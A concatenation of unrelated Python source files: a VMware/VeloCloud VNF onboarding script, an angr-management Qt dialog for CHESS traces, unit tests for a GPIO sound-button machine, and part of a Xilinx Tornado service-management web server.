def create_vnf_image(vnf_property_dict=None, config=None, ovf_adapt_fn=None):
"""
:param ovf_adapt_fn:
:param config:
:param vnf_property_dict:
:return:
"""
# populate ova setting
if ovf_adapt_fn is not None:
logging.info("OVF adaptation callback.")
ovf_adapt_fn(vnf_property_dict=vnf_property_dict)
# find host where we want deploy VM
objview = content.viewManager.CreateContainerView(
content.rootFolder, [vim.HostSystem], True)
esxi_hosts = objview.view
# we search for target ESXi system in vCenter inventory
target_host = None
for esxi_host in esxi_hosts:
if vnf_property_dict['target_host'] == esxi_host.name:
target_host = esxi_host
# if we didn't found target host
if target_host is None:
logging.warning("Target host {0} not found".format(vnf_property_dict['target_host']))
return False
# we choose largest storage on target esxi host
target_datastore = {'freeSpace': 0}
for ds in target_host.datastore:
storage_data = ds.summary
if storage_data.type == 'VMFS':
if target_datastore['freeSpace'] < storage_data.freeSpace:
target_datastore['datastore'] = storage_data.datastore
target_datastore['name'] = storage_data.name
vim_dict = {'datacenter_name': 'Datacenter',
'cluster_name': 'uCPE',
'datastore_name': target_datastore['name']}
objects = get_objects(si=si, vim_dict=vim_dict)
# read generate OVF file
ovffilename = "{0}/{1}/{2}".format(vnf_property_dict['image_dir'],
vnf_property_dict['target_host'],
vnf_property_dict['ovf_filename'])
# populate list of vmdk files
path_to_vmdk = vnf_property_dict['vnf_dir'] + '/.'
files = [f for f in os.listdir(path_to_vmdk) if re.match(r'[a-zA-z0-9]+.*\.vmdk', f)]
if files is None or len(files) == 0:
logging.warning("Image not found in {0}.".format(path_to_vmdk))
return False
ovfd = get_ovf_descriptor(ovffilename)
# generate name and create import spec
manager = si.content.ovfManager
uuid = get_uuidbyip(vnf_property_dict['target_host'])
vm_name = "{0}.{1}".format("velo-edge-vc", uuid)
# for esxi_host in esxi_hosts:
# if vnf_property_dict['target_host'] == esxi_host.name:
# print(esxi_host.config.network)
# print(get_obj(content, [vim.Network], 'VeloOutside'))
outside = get_obj(content, [vim.Network], 'VeloOutside')
if outside is None:
logging.debug("Port group VeloOutside not present")
inside = get_obj(content, [vim.Network], 'VeloInside')
if inside is None:
logging.debug("Port group VeloInside not present")
# print(outside)
netmap = [vim.OvfManager.NetworkMapping(name="GE1", network=inside),
vim.OvfManager.NetworkMapping(name="GE2", network=inside),
vim.OvfManager.NetworkMapping(name="GE3", network=outside),
vim.OvfManager.NetworkMapping(name="GE4", network=outside),
vim.OvfManager.NetworkMapping(name="GE5", network=inside),
vim.OvfManager.NetworkMapping(name="GE6", network=inside)]
spec_params = vim.OvfManager.CreateImportSpecParams(entityName=vm_name, ipAllocationPolicy='fixedPolicy',
networkMapping=netmap, ipProtocol='IPv4')
import_spec = manager.CreateImportSpec(ovfd,
objects["resource pool"],
objects['datastore'],
spec_params)
# in case OVF invalid import_sec will should have error flag.
if len(import_spec.error) == 0:
logging.info("OVF import is validated.")
else:
logging.info("Incorrect ovf format. vCenter rejected proposed OVF.")
print(import_spec.error)
return False
#
lease = objects["resource pool"].ImportVApp(import_spec.importSpec,
objects["datacenter"].vmFolder,
target_host)
logging.info("Creating lease object and uploading ovf.")
while True:
if lease.state == vim.HttpNfcLease.State.ready:
keepalive_thread = Thread(target=keep_lease_alive, args=(lease,))
keepalive_thread.start()
for deviceUrl in lease.info.deviceUrl:
url = deviceUrl.url.replace('*', config['vcenter']['ip'])
fileItem = list(filter(lambda x: x.deviceId == deviceUrl.importKey, import_spec.fileItem))[0]
vmdkfilename = "{0}/{1}".format(vnf_property_dict['vnf_dir'], fileItem.path)
imgfd = get_ovf_descriptor(vmdkfilename)
imgfd_size = os.stat(vmdkfilename)
logging.info("Uploading file {0} file size {1}".format(vmdkfilename, imgfd_size.st_size))
logging.info("Target endpoint {0}".format(url))
headers = {"Content-length": imgfd_size.st_size}
req = urllib2.Request(url, imgfd, headers)
response = urllib2.urlopen(req, context=context)
returncode = response.getcode()
if 200 <= returncode < 300:
logging.info("OVA successfully uploaded.")
lease.HttpNfcLeaseComplete()
keepalive_thread.join()
logging.info("OVF uploaded - changing power state of VNF.")
vnf = find_vnf(vnf_property_dict=vnf_property_dict, name=vm_name)
provision(vnf)
return True
elif lease.state == vim.HttpNfcLease.State.error:
logging.info("Lease error: %s" % lease.error)
break
def find_vnf(vnf_property_dict=None, name=None):
"""
Function searches VNF in vim.HostSystem.
:param name: optional parameter of VNF name that we search
:param vnf_property_dict: should contains target_host key that
point to hostname where we search VNF.
:return: vm object
"""
all_esxi_hosts = get_all_objs(content, [vim.HostSystem])
for h in all_esxi_hosts:
# find target host by hostname
if vnf_property_dict['target_host'] in h.name:
# find VM and power on.
for vm in h.vm:
if name is not None and name in vm.name:
logging.info("VNF -> {0} in a system.".format(name))
return vm
if vnf_property_dict['vnf_default_name'] in vm.name:
logging.info("VNF -> {0} in a system.".format(name))
return vm
return None
def callback(vnf_property_dict=None, config=None, ovf_adapt_fn=None):
"""
Main callback. It first check if VNF already on boarded and if it is
it boot is up.
Otherwise we push a new VNF to a target host.
vnf_property_dict must contain 'target_host' that indicates where
want to deploy a VNF.
ovf_adapt_fn is call back that caller might call in case caller need
Populate cutome ovf attributes. ( password / IP / default network)
:return:
"""
vnf = find_vnf(vnf_property_dict=vnf_property_dict)
if vnf is None:
create_vnf_image(vnf_property_dict=vnf_property_dict, config=config, ovf_adapt_fn=ovf_adapt_fn)
else:
logging.info("Changing power state for VNF.")
provision(vnf)
def delHostSwitch(host, vswitchName):
vswitch_spec = pyVmomi.vim.host.VirtualSwitch.Specification()
host.configManager.networkSystem.DelVirtualSwitch(vswitchName)
def addHostSwitch(host, vswitchName, pnicName=None):
"""
Adds a new local switch to a target ESXi host.
:param pnicName:
:param vswitchName:
:param host:
:type host: basestring
:type pnicName: basestring
:type vswitchName: basestring
"""
pnic = None
pnic_found = False
# find pnic on host device
for _pnic in host.config.network.pnic:
if pnicName == _pnic.device:
pnic = _pnic
break
# TODO at list
if pnic is not None:
pnic_list = [pnic]
vswitch_spec = pyVmomi.vim.host.VirtualSwitch.Specification()
vswitch_spec.numPorts = 16
vswitch_spec.mtu = 1500
vswitch_spec.bridge = vim.host.VirtualSwitch.BondBridge(nicDevice=[pnic.device])
host.configManager.networkSystem.AddVirtualSwitch(vswitchName, vswitch_spec)
else:
logging.warning("Error pnic {0} not found on the target host.".format(pnicName))
def AddHostPortgroup(host, vswitchName, portgroupName, vlanId):
"""
:param vswitchName:
:param portgroupName:
:param vlanId:
:return:
"""
portgroup_spec = pyVmomi.vim.host.PortGroup.Specification()
portgroup_spec.vswitchName = vswitchName
portgroup_spec.name = portgroupName
portgroup_spec.vlanId = int(vlanId)
network_policy = pyVmomi.vim.host.NetworkPolicy()
network_policy.security = pyVmomi.vim.host.NetworkPolicy.SecurityPolicy()
network_policy.security.allowPromiscuous = True
network_policy.security.macChanges = False
network_policy.security.forgedTransmits = False
portgroup_spec.policy = network_policy
host.configManager.networkSystem.AddPortGroup(portgroup_spec)
def get_uuidbyip(name):
"""
Returns esxi uuid by given name in vCenter inventory.
:type name: basestring
:return:
"""
if name is None or not name:
return None
# find host where we want deploy VM
objview = content.viewManager.CreateContainerView(
content.rootFolder, [vim.HostSystem], True)
esxi_hosts = objview.view
for esxi_host in esxi_hosts:
if name in esxi_host.name:
return esxi_host.hardware.systemInfo.uuid
return None
def find_vswitch(switch_name=None, esxi_hostname=None):
"""
:param switch_name:
:param esxi_hostname:
:type switch_name: basestring
:type esxi_hostname: basestring
:return: None or switch object
"""
esxi_host = get_esxi_host(esxi_hostname)
if esxi_host is not None:
for v_switch in esxi_host.config.network.vswitch:
if v_switch.name == switch_name:
return v_switch
return None
def find_port_group(switch_name=None, esxi_host=None, pg_name=None):
"""
Find port group on given ESXi host and vSwitch.
:param switch_name:
:param esxi_host:
:param pg_name:
:type switch_name: basestring
:type esxi_host: vim.HostSystem
:type pg_name: basestring
:return: None or switch object
"""
v_switch = find_vswitch(switch_name=switch_name, esxi_hostname=esxi_host.name)
if v_switch is not None:
for pg in esxi_host.config.network.portgroup:
if pg.spec.name == pg_name:
return pg
return None
def create_switches(vnf_property_dict=None, switch_list=None):
"""
Function creates a local switch on target ESXi host
:param vnf_property_dict:
:param switch_list:
:return:
"""
logging.info("Creating vswitches on target host.")
esxi_host = get_esxi_host(target_host=vnf_property_dict['target_host'])
if esxi_host is None:
logging.debug("Can't find target esxi host.")
return False
sw_is_added = False
pg_is_added = False
# for every switch in the list we create respected switch on esxi host
for sw_dict in switch_list:
sw_is_added = False
switch_add_retry = 0
while sw_is_added is False:
if switch_add_retry == 3:
break
# search for switch
if find_vswitch(sw_dict['vswitch'], vnf_property_dict['target_host']) is not None:
logging.info("Found vswitch {0}".format(sw_dict['vswitch']))
sw_is_added = True
else:
logging.info("Creating vswitch {0} pnic {1}".format(sw_dict['vswitch'], sw_dict['pnic']))
addHostSwitch(esxi_host, sw_dict['vswitch'], pnicName=sw_dict['pnic'])
if find_vswitch(sw_dict['vswitch']) is not None:
time.sleep(1)
else:
logging.info("Found vswitch {0}".format(sw_dict['vswitch']))
sw_is_added = True
# increment retry
switch_add_retry += 1
# we don't care about speed most important correctness so no timeing issues
for sw_dict in switch_list:
for switch in esxi_host.config.network.vswitch:
# find target switch
if switch.name == sw_dict['vswitch']:
pg_add_retry = 0
pg_is_added = False
while pg_is_added is False:
if pg_add_retry == 5:
break
if find_port_group(sw_dict['vswitch'], esxi_host, sw_dict['port-group-name']) is not None:
logging.info("Found port group {0}".format(sw_dict['port-group-name']))
pg_is_added = True
else:
logging.info("Adding new port group {0} to switch {1}".format(sw_dict['port-group-name'],
sw_dict['vswitch']))
AddHostPortgroup(esxi_host, sw_dict['vswitch'],
sw_dict['port-group-name'],
sw_dict['vlan_id'])
# we add / check and if not there we sleep and re-check again
if find_port_group(sw_dict['vswitch'], esxi_host, sw_dict['port-group-name']) is not None:
time.sleep(1)
else:
logging.info("Found port group {0}".format(sw_dict['port-group-name']))
pg_is_added = True
# increment retry
pg_add_retry += 1
if pg_is_added is True and sw_is_added is True:
return True
return False
def get_activation_key(config=None, edgeName=None):
"""
Function leverage Velo Cloud IP and requests activation key.
:param config:
:param edgeName:
:return:
:return:
"""
activation_key = None
client = ztp.velocloud.ApiClient(host=config['vce-vco'])
client.authenticate(config['vco-username'], config['vco-password'], operator=False)
api = ztp.velocloud.AllApi(client)
try:
params = {"enterpriseId": config['enterpriseId']}
res = api.enterpriseGetEnterpriseConfigurations(params)
for profile in res:
if config['profile-name'] in profile.name:
profileId = profile.id
params = {"enterpriseId": config['enterpriseId'],
"name": edgeName,
"description": "Onboarded automatically",
"modelNumber": "virtual",
"generate_certificate": False,
"configurationId": profileId}
res = api.edgeEdgeProvision(params)
return res
except ApiException as e:
print(e)
return activation_key
def main_loop(ch, method, properties, body):
"""
Main execution loop. Function enter a main loop upo
:return:
"""
logging.info("Starting vnf on-boarding task for a host {0}".format(body))
hostname = body
veloconfig = config['velocloud'] # configuration section for VeloCloud
vnf_networks = config['vnf-network'] # configuration section for esxi
skip_queue = False
# check that all directories are valid
if os.path.isdir(veloconfig['image-dir']) is False:
logging.warning("Error: '{0}' Image dir is invalid path {0}".format(veloconfig['image-dir']))
skip_queue = True
if os.path.isdir(veloconfig['vnf-dir']) is False:
logging.warning("Error: '{0}' vnf dir is invalid path {0}".format(veloconfig['vnf-dir']))
skip_queue = True
# remove last slash in case client indicate it
if veloconfig['image-dir'].endswith('\\'):
veloconfig['image-dir'] = veloconfig['image-dir'][:-1]
# remove last slash in case client indicate it
if veloconfig['vnf-dir'].endswith('\\'):
veloconfig['vnf-dir'] = veloconfig['vnf-dir'][:-1]
try:
# just basic check that hostname is valid
host_name = socket.gethostbyname(veloconfig['vce-vco'])
if host_name is None or len(host_name) == 0:
logging.warning("Invalid VCO hostname")
except socket.gaierror as e:
print("Exception: wrong VCO hostname. {0}".format(e.message))
if skip_queue is False:
try:
logging.info("Requesting activation key from vco {0}.".format(veloconfig['vce-vco']))
activation_key = get_activation_key(config=veloconfig, edgeName=hostname)
if activation_key is None:
logging.warning("Failed retrieve activation key from vco {0}.".format(veloconfig['vce-vco']))
return False
else:
logging.warning("Activation key for velo cloud edge VNF {0}.".format(activation_key.activationKey))
# we pack all properties in single dict
vnf_property_dict = {'ovf_filename': veloconfig['ovf-filename'],
'vnf_dir': veloconfig['vnf-dir'],
'image_dir': veloconfig['image-dir'],
'target_host': hostname,
'activation_code': activation_key.activationKey,
'vce.vco': veloconfig['vce-vco'],
'password': veloconfig['vnf-default-password'],
'vnf_default_name': veloconfig['vnf-default-name']}
logging.info("Target host system {0} {1}".format(vnf_property_dict['target_host'],
get_uuidbyip(vnf_property_dict['target_host'])))
create_switches(vnf_property_dict=vnf_property_dict, switch_list=vnf_networks['topology'])
callback(vnf_property_dict=vnf_property_dict, config=config, ovf_adapt_fn=populate_ova)
except TypeError as e:
print(e)
print("Exception wrong type. {0}".format(e.message))
except KeyError as e:
print(e)
print("Exception key not found {0}".format(e.message))
def validate_config():
if 'ampq' not in config:
logging.info("Error: ampq is mandatory configuration section. Please check yaml file.")
return False
if 'username' not in config['ampq']:
logging.info("Error: username is mandatory configuration section. Please check yaml file.")
return False
if 'password' not in config['ampq']:
logging.info("Error: password is mandatory configuration section. Please check yaml file.")
return False
if 'hostname' not in config['ampq']:
logging.info("Error: hostname is mandatory configuration section. Please check yaml file.")
return False
veloconfig = config['velocloud']
# mandatory configuration elements
mandatory_fields = ["vce-vco",
"ovf-filename",
"vnf-dir",
"image-dir",
"vnf-default-password",
"vnf-default-name",
"profile-name",
"enterpriseId",
"vco-username",
"vco-password"]
for field in mandatory_fields:
if field not in veloconfig:
logging.info("Error: '{0}' is mandatory configuration field. check default.yaml file.".format(field))
return False
return True
if __name__ == "__main__":
"""
Main entry for VNF on boarding listner.
"""
if validate_config() is True:
credentials = pika.PlainCredentials(config['ampq']['username'], config['ampq']['password'])
connection = pika.BlockingConnection(pika.ConnectionParameters(host=config['ampq']['hostname'],
credentials=credentials))
logging.getLogger("pika").setLevel(logging.WARNING)
channel = connection.channel()
channel.queue_declare(queue='vnfonboarding')
channel.basic_consume(main_loop, queue='vnfonboarding', no_ack=True)
logging.info('Waiting for VNF on boarding request. To stop press CTRL+C')
try:
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming()
connection.close()
|
chess_trace_list.py | # pylint:disable=unused-argument
import typing
from typing import List, Optional, Tuple, TYPE_CHECKING
import threading
import asyncio
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
import PySide2
from PySide2.QtWidgets import QDialog, QPushButton, QHBoxLayout, QVBoxLayout, QMessageBox, QTableView, \
QAbstractItemView, QHeaderView, QLabel
from PySide2.QtCore import Qt, QAbstractTableModel
try:
import slacrs
except ImportError:
slacrs = None
from angrmanagement.logic.threads import gui_thread_schedule_async
if TYPE_CHECKING:
from angrmanagement.ui.workspace import Workspace
class TraceDescriptor:
"""
Models a trace.
"""
def __init__(self, trace_id: str, input_id: str, created_at, type_: str):
self.trace_id = trace_id
self.input_id = input_id
self.created_at = created_at
self.type = type_
class QTraceTableModel(QAbstractTableModel):
"""
Implements a table model for traces.
"""
Headers = ["Trace ID", "Created at", "Input ID", "Input Length", "Type"]
COL_TRACEID = 0
COL_CREATEDAT = 1
COL_INPUTID = 2
COL_INPUTLENGTH = 3
COL_TYPE = 4
def __init__(self):
super().__init__()
self._traces: List[TraceDescriptor] = [ ]
@property
def traces(self):
return self._traces
@traces.setter
def traces(self, v):
self.beginResetModel()
self._traces = v
self.endResetModel()
def rowCount(self, parent:PySide2.QtCore.QModelIndex=...) -> int:
return len(self.traces)
def columnCount(self, parent:PySide2.QtCore.QModelIndex=...) -> int:
return len(self.Headers)
def headerData(self, section:int, orientation:PySide2.QtCore.Qt.Orientation, role:int=...) -> typing.Any:
if role != Qt.DisplayRole:
return None
if section < len(self.Headers):
return self.Headers[section]
return None
def data(self, index:PySide2.QtCore.QModelIndex, role:int=...) -> typing.Any:
if not index.isValid():
return None
row = index.row()
if row >= len(self.traces):
return None
trace = self.traces[row]
col = index.column()
if role == Qt.DisplayRole:
return self._get_column_text(trace, col)
return None
@staticmethod
def _get_column_text(trace: TraceDescriptor, col: int) -> str:
mapping = {
QTraceTableModel.COL_TRACEID: QTraceTableModel._get_trace_id,
QTraceTableModel.COL_CREATEDAT: QTraceTableModel._get_trace_created_at,
QTraceTableModel.COL_TYPE: QTraceTableModel._get_trace_type,
QTraceTableModel.COL_INPUTID: QTraceTableModel._get_trace_input_id,
QTraceTableModel.COL_INPUTLENGTH: lambda x: "Unknown",
}
return mapping[col](trace)
@staticmethod
def _get_trace_id(trace: TraceDescriptor) -> str:
return trace.trace_id
@staticmethod
def _get_trace_created_at(trace: TraceDescriptor) -> str:
return trace.created_at
@staticmethod
def _get_trace_type(trace: TraceDescriptor) -> str:
return trace.type
@staticmethod
def _get_trace_input_id(trace: TraceDescriptor) -> str:
return trace.input_id
class QTraceTableView(QTableView):
"""
Implements a trace view for CHESS traces.
"""
def __init__(self):
super().__init__()
self.horizontalHeader().setVisible(True)
self.verticalHeader().setVisible(False)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setSelectionMode(QAbstractItemView.MultiSelection)
self.setHorizontalScrollMode(self.ScrollPerPixel)
self.horizontalHeader().setDefaultAlignment(Qt.AlignLeft)
self.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.model: QTraceTableModel = QTraceTableModel()
self.setModel(self.model)
class QChessTraceListDialog(QDialog):
"""
Implements a CHESS trace list dialog.
"""
def __init__(self, workspace: 'Workspace', parent=None):
super().__init__(parent)
if slacrs is None:
QMessageBox.Critical(self,
"Slacrs is not installed",
"Cannot import slacrs. Please make sure slacrs is properly installed.",
QMessageBox.Ok)
self.close()
return
self.workspace = workspace
self.trace_ids: Optional[List[Tuple[str,str]]] = None # input ID, trace ID
self.setMinimumWidth(400)
self._status_label: QLabel = None
self._table: QTraceTableView = None
self._ok_button: QPushButton = None
self._cancel_button: QPushButton = None
self.setWindowTitle("Open traces from CHECRS")
self.setWindowFlags(self.windowFlags() & ~Qt.WindowContextHelpButtonHint)
self._init_widgets()
self._status_label.setText("Loading...")
self.workspace.main_window.app.processEvents()
th = threading.Thread(target=self._load_traces, daemon=True)
th.start()
def _init_widgets(self):
# table
self._table = QTraceTableView()
# status
status_lbl = QLabel("Status:")
self._status_label = QLabel()
status_layout = QHBoxLayout()
status_layout.addWidget(status_lbl)
status_layout.addWidget(self._status_label)
status_layout.addStretch(0)
# buttons
self._ok_button = QPushButton("Ok")
self._ok_button.clicked.connect(self._on_ok_button_clicked)
self._cancel_button = QPushButton("Cancel")
self._cancel_button.clicked.connect(self._on_cancel_button_clicked)
buttons_layout = QHBoxLayout()
buttons_layout.addWidget(self._ok_button)
buttons_layout.addWidget(self._cancel_button)
layout = QVBoxLayout()
layout.addWidget(self._table)
layout.addLayout(status_layout)
layout.addLayout(buttons_layout)
self.setLayout(layout)
def _load_traces(self):
from slacrs.model import Input, Trace # pylint:disable=import-outside-toplevel,import-error
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
connector = self.workspace.plugins.get_plugin_instance_by_name("ChessConnector")
if connector is None:
return
connector = self.workspace.plugins.get_plugin_instance_by_name("ChessConnector")
if connector is None:
# chess connector does not exist
return
slacrs_instance = connector.slacrs_instance()
if slacrs_instance is None:
# slacrs does not exist. continue
return
session = slacrs_instance.session()
target_image_id = connector.target_image_id
if not target_image_id:
return
traces: List[TraceDescriptor] = [ ]
db_traces = session.query(Trace).join(Trace.input).filter(
Input.target_image_id == target_image_id
)
for db_trace in db_traces:
db_trace: Trace
t = TraceDescriptor(db_trace.id, db_trace.input_id, db_trace.created_at, "block trace")
traces.append(t)
session.close()
gui_thread_schedule_async(self._update_table, args=(traces,))
def _update_table(self, traces):
self._table.model.traces = traces
self._table.viewport().update()
self._status_label.setText("Ready.")
#
# Events
#
def _on_ok_button_clicked(self):
selection_model = self._table.selectionModel()
if not selection_model.hasSelection():
QMessageBox.warning(self,
"No target is selected",
"Please select a CHESS target to continue.",
QMessageBox.Ok)
return
rows = selection_model.selectedRows()
self.trace_ids = [ ]
for row in rows:
trace = self._table.model.traces[row.row()]
self.trace_ids.append((trace.input_id, trace.trace_id))
self.close()
def _on_cancel_button_clicked(self):
self.close()
|
test_noisemachine.py | from enum import auto
import unittest
from gpiozero import Device
from gpiozero.pins.mock import MockFactory
from noisemachine import NoiseMachine
from os import chdir
from os.path import realpath, split
from unittest import mock
from unittest.mock import patch
from time import sleep
import threading
Device.pin_factory = MockFactory()
# Set the current directory to be in the same place as the test script.
chdir(split(realpath(__file__))[0])
class TestNoiseMachine(unittest.TestCase):
def setUp(self):
self.machine = NoiseMachine()
self.stop_event = threading.Event()
self.monitor_thread = threading.Thread(target=self.machine.monitor, args=[self.stop_event])
self.monitor_thread.start()
def tearDown(self) -> None:
self.stop_event.set()
for button in self.machine.buttons.values():
button.gpio_object.close()
def test_init(self):
self.assertNotEqual(self.machine.buttons, [])
self.assertEqual(len(self.machine.buttons), 5)
def test_single_button_single_action(self):
with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
self.machine.buttons[5].gpio_object.pin.drive_high()
sleep(0.1)
self.machine.buttons[5].gpio_object.pin.drive_low()
sleep(0.5)
self.assertTrue(self.monitor_thread.is_alive())
self.assertTrue(mock_patch.called)
self.assertEqual(mock_patch.call_args.args[0][3], '5-single.wav')
def test_double_button_single_action(self):
with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
self.machine.buttons[5].gpio_object.pin.drive_high()
sleep(0.05)
self.machine.buttons[5].gpio_object.pin.drive_low()
sleep(0.1)
self.machine.buttons[5].gpio_object.pin.drive_high()
sleep(0.05)
self.machine.buttons[5].gpio_object.pin.drive_low()
sleep(0.5)
self.assertTrue(self.monitor_thread.is_alive())
self.assertTrue(mock_patch.called)
self.assertEqual(mock_patch.call_args.args[0][3], '5-double.wav')
def test_single_button_random_action(self):
with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
for _ in range(0, 5):
self.machine.buttons[26].gpio_object.pin.drive_high()
sleep(0.1)
self.machine.buttons[26].gpio_object.pin.drive_low()
sleep(0.5)
self.assertIn(mock_patch.call_args.args[0][3], ['26-single-random-1.wav', '26-single-random-2.wav', '26-single-random-3.wav'])
self.assertTrue(self.monitor_thread.is_alive())
self.assertTrue(mock_patch.called)
self.assertEqual(mock_patch.call_count, 5)
def test_double_button_random_action(self):
with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
for _ in range(0, 5):
self.machine.buttons[26].gpio_object.pin.drive_high()
sleep(0.05)
self.machine.buttons[26].gpio_object.pin.drive_low()
sleep(0.1)
self.machine.buttons[26].gpio_object.pin.drive_high()
sleep(0.05)
self.machine.buttons[26].gpio_object.pin.drive_low()
sleep(0.5)
self.assertIn(mock_patch.call_args.args[0][3], ['26-double-random-1.wav', '26-double-random-2.wav', '26-double-random-3.wav'])
self.assertTrue(self.monitor_thread.is_alive())
self.assertTrue(mock_patch.called)
self.assertEqual(mock_patch.call_count, 5)
def test_unassigned_action(self):
with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
self.machine.buttons[6].gpio_object.pin.drive_high()
sleep(0.1)
self.machine.buttons[6].gpio_object.pin.drive_low()
sleep(0.5)
self.assertTrue(self.monitor_thread.is_alive())
self.assertFalse(mock_patch.called)
def test_single_button_sequence_action(self):
expected_files = ['19-single-sequence-1.wav', '19-single-sequence-2.wav', '19-single-sequence-3.wav']
with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
for i in range(0, 3):
self.machine.buttons[19].gpio_object.pin.drive_high()
sleep(0.1)
self.machine.buttons[19].gpio_object.pin.drive_low()
sleep(0.5)
self.assertEqual(mock_patch.call_args.args[0][3], expected_files[i])
self.assertTrue(self.monitor_thread.is_alive())
def test_double_button_sequence_action(self):
expected_files = ['19-double-sequence-1.wav', '19-double-sequence-2.wav', '19-double-sequence-3.wav']
with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
for i in range(0, 3):
self.machine.buttons[19].gpio_object.pin.drive_high()
sleep(0.05)
self.machine.buttons[19].gpio_object.pin.drive_low()
sleep(0.1)
self.machine.buttons[19].gpio_object.pin.drive_high()
sleep(0.05)
self.machine.buttons[19].gpio_object.pin.drive_low()
sleep(0.5)
self.assertEqual(mock_patch.call_args.args[0][3], expected_files[i])
self.assertTrue(self.monitor_thread.is_alive())
def test_playback_interrupt(self):
with mock.patch('noisemachine.subprocess.Popen', autospec=True) as mock_patch:
mock_patch.return_value.poll.return_value = None
self.machine.buttons[5].gpio_object.pin.drive_high()
sleep(0.05)
self.machine.buttons[5].gpio_object.pin.drive_low()
sleep(1)
self.machine.buttons[5].gpio_object.pin.drive_high()
sleep(0.05)
self.machine.buttons[5].gpio_object.pin.drive_low()
sleep(0.5)
self.assertTrue(self.monitor_thread.is_alive())
self.assertTrue(mock_patch.called)
self.assertEqual(mock_patch.call_args.args[0][3], '5-single.wav')
self.assertTrue(mock_patch.return_value.terminate.called)
|
server.py | #!/usr/bin/python
# Copyright 2019 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# logging should be setup first so imported modules' logging is configured too
import os
from vai.dpuv1.rt import logging_mp
log_file = os.environ['VAI_ALVEO_ROOT'] + "/../demo/neptune/logging.ini"
logging_mp.setup_logger(log_file, 'neptune')
from datetime import datetime
import json
import signal
import threading
import time
import tornado.ioloop
import tornado.web
import tornado.websocket
import uuid
import importlib
import logging
import six
if six.PY3:
import asyncio
import numpy as np
from tornado.options import define, options, parse_command_line
if six.PY3:
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
from neptune.common import DummyClass, list_submodules, hinted_tuple_hook
if six.PY3:
from neptune.common_py3 import cancel_async_tasks
else:
from neptune.common import cancel_async_tasks
import neptune.construct as construct
from neptune.service_manager import ServiceManager
from neptune.node_manager import NodeManager
from vai.dpuv1.rt import xstream
define("port", default=8998, help="run web server on this port", type=int)
define("wsport", default=8999, help="run websocket server on this port", type=int)
define("debug", default=True, help="run in debug mode")
logger = logging.getLogger(__name__)
class IndexHandler(tornado.web.RequestHandler):
def get(self, *args):
self.render("index.html", wsport=options.wsport)
class ListServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
ret = {'services': []}
try:
services_list = ServiceManager().list()
services = []
for name, svc in services_list.items():
services.append({
'name': name,
'state': svc['state'],
'url': svc['url'],
'throughput': svc['throughput']
})
services.sort(key=lambda x: x['name'])
ret = {'services': services}
except Exception as e:
logger.exception("List service error")
self.write(json.dumps(ret, sort_keys=True))
class QueryServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
service_name = self.get_argument("service")
ret = {}
try:
services_list = ServiceManager().list()
if service_name in services_list:
ret = services_list[service_name]
del ret['service']
except Exception as e:
logger.exception("Query service error")
self.write(json.dumps(ret, sort_keys=True))
class StartServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
service_name = self.get_argument("id")
runtime_args = self.get_argument("args", {})
ServiceManager().start(service_name, runtime_args)
self.write("service started")
def post(self, *args):
data = json.loads(self.request.body)
service_name = data["id"] # in unicode
runtime_args = data["args"] if 'args' in data else {}
ServiceManager().start(service_name, runtime_args)
self.write("service started")
class StopServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
service_name = self.get_argument("id")
ServiceManager().stop(service_name)
self.write("service stopped")
class ConstructServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
self.write("POST a recipe to this address to construct it")
def post(self, *args):
"""
Parse JSON arguments in POST body. In Requests module, use json key to
pass in arguments, not data (which may clobber JSON objects)
"""
recipe = json.loads(self.request.body, object_hook=hinted_tuple_hook)
tornado_handler = construct.construct(recipe)
name = str(recipe['name'])
url = str(recipe['url'])
self.application.add_handlers(
r".*", # match any host
tornado_handler
)
self.write("service %s constructed at /serve/%s" % (name, url))
# FIXME clients being able to destroy services others may be using is problematic
class DestructServiceHandler(tornado.web.RequestHandler):
def _destroy(self):
url = str(self.get_argument("url"))
name = str(self.get_argument("name"))
fake_request = DummyClass()
found_index = -1
# There's no method in Tornado to delete an added handler currently.
# By examining the source, the code below works to do so. If Tornado
# adds an API to do this, this code should be replaced. It may also
# break with changes to Tornado (tested with Tornado 5.1.1 on 8/15/2019)
for index, parent_rule in enumerate(self.application.default_router.rules):
rules = parent_rule.target.rules
for rule in rules:
fake_request.path = r"/serve/" + url
if isinstance(rule.matcher.match(fake_request), dict):
found_index = index
return found_index, name, url
def get(self, *args):
self.write("POST the name and url of the service to destroy") # TODO only should specify one
def post(self, *args):
found_index, name, url = self._destroy()
if found_index != -1:
del self.application.default_router.rules[found_index]
ServiceManager().remove(name)
recipe_cache = os.environ["VAI_ALVEO_ROOT"] + "/../demo/neptune/recipes/recipe_%s.bak" % name
os.remove(recipe_cache)
self.write("service destroyed at /serve/%s" % url)
else:
self.write("Service %s cannot be destroyed as it does not exist" % name)
class RenderHandler(tornado.web.RequestHandler):
def get(self, *args):
url = self.request.uri
url_arg = url.split('/')[-1]
html = url_arg + ".html"
self.render(html, wsport=options.wsport)
class RequestIdGenerator(object):
def __init__(self):
self.handler_ids = {}
def get(self, name='__default__'):
if name not in self.handler_ids:
self.handler_ids[name] = 0
curr_id = self.handler_ids[name]
self.handler_ids[name] = (curr_id + 1) % 10000 # wraparound
return curr_id
